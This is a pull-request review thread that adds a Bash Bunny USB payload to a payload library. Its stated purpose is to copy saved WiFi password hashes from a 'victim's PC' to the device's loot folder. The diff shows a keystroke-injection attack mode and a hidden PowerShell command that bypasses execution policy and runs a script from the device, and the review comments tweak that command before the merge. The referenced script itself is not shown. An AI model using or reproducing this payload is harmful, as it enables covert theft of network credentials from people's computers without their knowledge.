### PR TITLE
WiFi Hash Scraper

### PR DESCRIPTION
**Pull request by KryptoKola**
Scrapes and saves all the known network / wifi hashes on the victims pc to the loot folder of the bash bunny

### CODE REVIEW

File: payloads/library/recon/WiFi-Hash-Scraper/payload.txt [hunk 1]
```diff
@@ -0,0 +1,22 @@
...
+# Description:      
+# 			  Copies all of the known / saved WiFi password hashes from the victim's PC to the BashBunny's loot folder.
+#
+# Author:           KryptoKola
+# Version:          1.0
+# Category:         Recon
+# Target:           Microsoft Windows 10 & 11
+
+ATTACKMODE HID STORAGE
+
```
Comment (rsxchin) [inline payloads/library/recon/WiFi-Hash-Scraper/payload.txt:14]: GET BB_LABEL

File: payloads/library/recon/WiFi-Hash-Scraper/payload.txt [hunk 2]
```diff
@@ -0,0 +1,22 @@
...
+LED SETUP
+GET SWITCH_POSITION
+LED ATTACK
+RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel 'BashBunny').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"
```
Comment (rsxchin) [inline payloads/library/recon/WiFi-Hash-Scraper/payload.txt:18]: RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel '${BB_LABEL}').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"

Comment (KryptoKola) [reply payloads/library/recon/WiFi-Hash-Scraper/payload.txt]: I have made this change per your request --- thank you!

Comment (rsxchin) [reply payloads/library/recon/WiFi-Hash-Scraper/payload.txt]: Don't forget to add the GET BB_LABEL in the setup to initialize the variable

Comment (KryptoKola) [reply payloads/library/recon/WiFi-Hash-Scraper/payload.txt]: I just made this change. Thank you!

**Pull request merged**